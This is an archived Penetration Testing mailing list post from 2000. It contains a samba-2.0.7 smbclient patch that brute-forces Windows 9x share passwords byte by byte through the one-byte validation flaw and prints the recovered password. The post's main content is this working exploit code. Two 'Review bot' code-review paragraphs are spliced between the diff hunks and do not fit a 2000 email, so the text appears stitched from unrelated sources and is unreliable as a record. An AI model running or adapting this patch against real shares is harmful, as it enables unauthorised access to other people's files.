Penetration Testing mailing list archives

Re: [PEN-TEST] How to test 1 byte password for win9X share


From: Christophe GRENIER <grenier () NEF ESIEA FR>
Date: Wed, 18 Oct 2000 12:21:48 +0200

On Tue, 17 Oct 2000, soren wrote:

> Hi naif:)
> It does work for me, with smbclient 2.0.6 and with the 'patch' that was
> posted on BUGTRAQ.

Idem, it works well. I have modified smbclient to give me the password.

        Christophe

--- samba-2.0.7/source/client/client.c.org      Wed Apr 26 01:06:41 2000
+++ samba-2.0.7/source/client/client.c  Mon Oct 16 14:57:40 2000
@@ -1889,6 +1889,7 @@
        char *server_n;
        struct in_addr ip;
        extern struct in_addr ipzero;
+       int pwd_length=1;

        if (*share == '\\') {
                server = share+2;
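Review bot: the initializer in `int pwd_length=1;` is dead, since the second hunk immediately resets it with `for(pwd_length=0; ...)`; either drop the initializer or declare the variable in the loop where it is used. A short comment on what the counter indexes (the byte position in `password` being probed) would also help, because nothing in this hunk explains it.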
@@ -1974,14 +1975,26 @@

        DEBUG(4,(" session setup ok\n"));

+/*
        if (!cli_send_tconX(c, share, "?????",
                            password, strlen(password)+1)) {
                DEBUG(0,("tree connect failed: %s\n", cli_errstr(c)));
                cli_shutdown(c);
                return NULL;
        }
-
-       DEBUG(4,(" tconx ok\n"));
+*/
+       for(pwd_length=0;pwd_length<14;pwd_length++)
+       {
+         password[pwd_length] = 0;
+         password[pwd_length+1] = 0;
+         c->sec_mode = 0;
+         do{
+           password[pwd_length]+=1;
+         }while(password[pwd_length] && !cli_send_tconX(c, share, "?????", password, pwd_length+1));
+         DEBUG(4,(" tconx ok\n"));
+         fflush(stdout);
+       }
+       printf("Password : %s\n",password);

        return c;
 }
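Review bot: the original tree-connect error path is commented out rather than replaced, so after this change `cli_send_tconX` failing no longer calls `cli_shutdown(c)` or returns NULL; the function falls through to `return c` and `DEBUG(4,(" tconx ok\n"))` is printed on every iteration whether or not a connect ever succeeded, which makes the log output misleading. The inner `do{ ... }while(password[pwd_length] && ...)` also exits when the byte wraps from 255 to 0 without any match (for example when the real password is shorter than 14 bytes), and the outer loop keeps going instead of stopping at that point, so the final `printf` can report a truncated or wrong value. Finally, `password[pwd_length+1] = 0` writes index 14 on the last pass, and the declared size of `password` is not visible in this hunk; it needs to be checked against the buffer's real length. Leaving the original block as a `/* ... */` comment instead of deleting it should also be cleaned up before this is merged anywhere.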

-------------------------------------------------------------------------------
  ,-~~-.___.     ._.                       -= GRENIER Christophe =-
 / |  '     \    | |"""""""""|              sysadm de nef.esiea.fr
(  )         0   | |         |                     ESIEA
 \_/-, ,----'    | |         |          Ecole Superieure d'Informatique -
    ====         !_!--v---v--"          Electronique - Automatique
    /  \-'~;      |""""""""|
   /  __/~| ._-""||        |            Email: grenier () nef esiea fr
 =(  _____|_|____||________| http://www.esiea.fr/public_html/Christophe.GRENIER/
-------------------------------------------------------------------------------
